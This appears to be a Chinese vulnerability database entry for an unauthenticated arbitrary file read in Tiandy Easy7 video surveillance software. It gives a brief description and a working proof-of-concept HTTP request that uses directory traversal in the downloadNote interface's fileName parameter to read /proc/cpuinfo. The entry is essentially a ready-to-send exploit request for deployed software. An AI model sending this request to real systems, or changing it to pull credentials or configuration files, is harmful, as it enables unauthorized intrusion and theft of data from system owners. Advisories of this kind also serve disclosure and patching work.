天地伟业Easy7 downloadNote 任意文件读取

日期: 2025-10-27 | 影响软件: 天地伟业Easy7 | POC: 已公开

漏洞描述

天地伟业Easy7在特定接口存在任意文件读取,未授权用户可构造特殊请求读取系统内任意文件数据。

PoC代码

GET /Easy7/rest/file/downloadNote?fileName=../../../../../../proc/cpuinfo&fullName=cpuinfo HTTP/1.1

相关漏洞推荐